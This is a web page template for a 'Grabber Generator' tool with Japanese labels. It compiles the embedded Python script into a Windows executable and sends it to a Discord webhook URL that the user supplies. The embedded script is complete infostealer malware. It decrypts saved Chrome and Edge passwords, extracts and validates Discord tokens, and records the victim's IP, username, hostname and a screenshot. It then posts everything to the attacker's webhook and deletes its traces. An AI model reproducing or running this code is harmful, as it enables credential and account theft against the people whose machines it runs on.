<!DOCTYPE html>
<html lang="ja" data-bs-theme="dark">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Discord Annoyance Tools - GrabberGenerator</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css2?family=Russo+One&display=swap" rel="stylesheet">
    <link href="static/style.css" rel="stylesheet">
</head>
<body>
    <div class="bg"></div>
    <div class="container">
        <header class="header">
            <div class="notification">
                <img src="static/discordLogo.svg" class="notification-icon">
                <span class="notification-count" id="notificationCount">0</span>
            </div>
            <h1 class="title">Grabber Generator</h1>
            <ul class="nav">
                <li><a href="/tools">Tools</a></li>
            </ul>
        </header>
        <div class="content">
            {% if error %}
            <p class="text-danger">{{ error | safe }}</p>
            {% elif success %}
            <p class="text-success">{{ success }}</p>
            {% endif %}
            <p>作成したGrabberのexeは入力したWebhook URLに送信されます</p>
            <div class="row">
                <div class="col-md-6">
                    <form method="post" class="mb-3" id="form" accept-charset="UTF-8">
                        <div class="mb-2">
                            <label for="webhookUrl">WebHook URL</label>
                            <input type="text" class="form-control" id="webhookUrl" name="webhookUrl" required>
                        </div>
                        <div class="mb-2">
                            <label for="libraries">使用ライブラリリスト（カンマ区切り）</label>
                            <input type="text" class="form-control" id="libraries" name="libraries" value="requests,mss,Pillow,pycryptodome" required>
                        </div>
                        <div class="mb-2">
                            <label for="script">Pythonスクリプト（変更は開発者向け）（WebhookURLはpwu.datというファイルにシーザー暗号で保存します）:</label>
                            <textarea class="form-control" id="script" name="script" rows="20">_D='encrypted_key'
_C='os_crypt'
_B='loginData'
_A='utf-8'
import requests,getpass,sqlite3,shutil,socket,base64,json,mss,re,os,Crypto,ctypes
from ctypes import*
from ctypes.wintypes import*
from Crypto.Cipher import AES
LOCAL=os.getenv('LOCALAPPDATA')
ROAMING=os.getenv('APPDATA')
CHROMIUM_DIRS=[f"{LOCAL}\\Google\\Chrome",f"{LOCAL}\\Microsoft\\Edge",f"{LOCAL}\\Google\\Chrome SxS"]
DISCORD_DIRS=[f"{ROAMING}\\discord",f"{ROAMING}\\discordcanary",f"{ROAMING}\\Lightcord",f"{ROAMING}\\discordptb"]
data=''
class DATA_BLOB(ctypes.Structure):_fields_=[('cbData',DWORD),('pbData',LPBYTE)]
def decryptData(encryptedData):
    A=None;crypt32=ctypes.windll.crypt32;crypt32.CryptUnprotectData.restype=BOOL;crypt32.CryptUnprotectData.argtypes=[ctypes.POINTER(DATA_BLOB),ctypes.POINTER(ctypes.c_wchar_p),ctypes.POINTER(DATA_BLOB),LPVOID,LPVOID,DWORD,ctypes.POINTER(DATA_BLOB)];encryptedBlob=DATA_BLOB();encryptedBlob.cbData=len(encryptedData);buffer=ctypes.create_string_buffer(encryptedData);encryptedBlob.pbData=ctypes.cast(buffer,LPBYTE);decryptedBlob=DATA_BLOB();result=crypt32.CryptUnprotectData(ctypes.byref(encryptedBlob),A,A,A,A,0,ctypes.byref(decryptedBlob))
    if result:decryptedData=ctypes.string_at(decryptedBlob.pbData,decryptedBlob.cbData);return decryptedData
    else:error_code=ctypes.GetLastError();raise Exception(f"Data decryption failed with error code: {error_code}")
def getUserInfo(token):
    if not token:return False
    headers={'Content-Type':'application/json','Authorization':token};res=requests.get('https://discord.com/api/v9/users/@me',headers=headers);return str(res.status_code)[0]=='2',res.text
def findDiscordTokens():
    tokens={}
    for discord in DISCORD_DIRS:
        localState=f"{discord}\\Local State";leveldb=f"{discord}\\Local Storage\\leveldb"
        if not os.path.exists(leveldb):continue
        with open(localState,encoding=_A)as f:d=json.load(f)
        encryptedKey=d[_C][_D];encryptedKey=encryptedKey.encode(_A);encryptedKey=base64.b64decode(encryptedKey)[5:];secretKey=decryptData(encryptedKey)
        for file in os.listdir(leveldb):
            if not file.endswith(('.log','.ldb')):continue
            with open(os.path.join(leveldb,file),'r',errors='ignore')as file:
                lines=file.readlines()
                for line in lines:
                    for regexLine in re.findall('dQw4w9WgXcQ:[^"]*',line):
                        try:
                            x=base64.b64decode(regexLine.split('dQw4w9WgXcQ:')[1]);initialisationVector=x[3:15];encryptedToken=x[15:];cipher=AES.new(secretKey,AES.MODE_GCM,initialisationVector);token=cipher.decrypt(encryptedToken)[:-16].decode();userInfo=getUserInfo(token)
                            if userInfo[0]:
                                if token in tokens:continue
                                tokens[token]=userInfo[1];break
                        except Exception as e:continue
    return tokens
def findChromiumDatas():
    resultStr='===== Find Chromium Datas =====\n'
    for dir in CHROMIUM_DIRS:
        localState=f"{dir}\\User Data\\Local State"
        if not os.path.exists(localState):continue
        resultStr+='===== '+dir.split('\\')[-1]+' =====\n'
        with open(localState,encoding=_A)as f:d=json.load(f)
        profiles=d['profile']['info_cache'];encryptedKey=d[_C][_D];encryptedKey=encryptedKey.encode(_A);encryptedKey=base64.b64decode(encryptedKey)[5:];secretKey=decryptData(encryptedKey)
        for profileName in profiles:
            profile=profiles[profileName];resultStr+=profileName+':\n    Email:'+profile['user_name']+'\n    Name:'+profile['gaia_name']+'\n    LoginData:\n';loginDataDb=f"{dir}\\User Data\\{profileName}\\Login Data";shutil.copy2(loginDataDb,_B);c=sqlite3.connect(_B);cu=c.cursor();cu.execute('SELECT action_url, username_value, password_value FROM logins')
            for(i,l)in enumerate(cu.fetchall()):
                url=l[0];username=l[1];initialisationVector=l[2][3:15];encryptedPassword=l[2][15:-16];cipher=AES.new(secretKey,AES.MODE_GCM,initialisationVector);password=cipher.decrypt(encryptedPassword).decode()
                if url and username and password:resultStr+=f"\n        ServiceUrl:{url}\n        Username:{username}\n        Password:{password}\n"
            c.close()
    return resultStr
def main():
    B='file';A='screenshot.png';print('Start....');resultStr=findChromiumDatas();tokens=findDiscordTokens();ip=requests.get('https://ifconfig.me').text;useUser=getpass.getuser();hostName=socket.gethostname();monitor={'left':0,'top':0,'width':1920,'height':1080}
    with mss.mss()as sct:screenshot=sct.grab(monitor);mss.tools.to_png(screenshot.rgb,screenshot.size,output=A)
    screenshot=open(A,'rb');message=f"""# Grabber Result
```
IP:{ip}
UseUser:{useUser}
HostName:{hostName}```
## Tokens
```
"""
    for token in tokens:userInfo=json.loads(tokens[token]);message+=f"""Token - {token}
UserId - {userInfo["id"]}
UserName - {userInfo["username"]}
GlobalName - {userInfo["global_name"]}
Email - {userInfo["email"]}
PhoneNumber - {userInfo["phone"]}

"""
    message+='```';requests.post(WEBHOOK_URL,data={'content':message},files={B:screenshot});requests.post(WEBHOOK_URL,files={B:('loginData.txt',resultStr.encode())});screenshot.close();files=[_B,A]
    for file in files:os.remove(file)
if __name__=='__main__':main()</textarea>
                        </div>
                        <button type="submit" id="submit" class="btn btn-primary">
                            <span class="spinner-border spinner-border-sm d-none" role="status" aria-hidden="true"></span>
                            作成
                        </button>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <script>
        document.getElementById('form').addEventListener('submit', function(event) {
            var webhookUrlInput = document.getElementById("webhookUrl");
            var librariesInput = document.getElementById("libraries");
            var scriptInput = document.getElementById("script");
            var submitButton = document.getElementById("submit");
            webhookUrlInput.readOnly = librariesInput.readOnly = scriptInput.readOnly = true;
            submitButton.disabled = true;
            var spinner = this.querySelector('.spinner-border');
            spinner.classList.remove('d-none');
        });

        let count = 0;
        const notificationCount = document.getElementById('notificationCount');

        setInterval(() => {
            count = (count + 1) % 201; // 200を超えたらリセット
            notificationCount.textContent = count;
        }, 50);
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js" integrity="sha384-geWF76RCwLtnZ8qwWowPQNguL3RmwHVBC9FhGdlKrxdiJJigb/j/68SIy3Te4Bkz" crossorigin="anonymous"></script>
</body>
</html>